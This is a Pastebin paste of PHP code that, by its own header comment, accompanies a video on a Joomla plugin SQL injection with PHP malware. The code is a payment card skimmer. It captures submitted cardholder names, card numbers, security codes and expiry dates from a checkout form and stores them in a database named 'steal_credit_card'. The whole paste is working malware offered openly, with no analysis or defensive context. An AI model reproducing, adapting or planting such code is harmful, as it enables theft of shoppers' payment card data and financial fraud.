Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- *
- * Code relative to Joomla Plugin SQL Injection + PHP Malware: http://www.youtube.com/watch?v=TzujNB61FvE
- *
- */
- // insert new credit card
- if( isset($_POST['creditcard_code']) && trim($_POST['creditcard_code']) != "" ) {
- // Do trim
- $cc_type = addslashes(trim($_POST['creditcard_code']));
- $cc_name = addslashes(trim($_POST['order_payment_name']));
- $cc_number = addslashes(trim($_POST['order_payment_number']));
- $cc_code = (int) trim($_POST['credit_card_code']);
- $cc_exp_m = (int) trim($_POST['order_payment_expire_month']);
- $cc_exp_y = (int) trim($_POST['order_payment_expire_year']);
- $cc_date = $cc_exp_y ."-". $cc_exp_m ."-01";
- $handle = mysql_connect('localhost','root','password') or die('Mysql DB connect fail');
- mysql_select_db('steal_credit_card') or die('db select fail');
- // Do query
- mysql_query("INSERT INTO cc (type, cc_name, cc_number, cc_security_code, exp_date) VALUES ('".$cc_type."','".$cc_name."', $cc_number, $cc_code,'".$cc_date."' )") or die('query failed');
- mysql_close($handle);
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement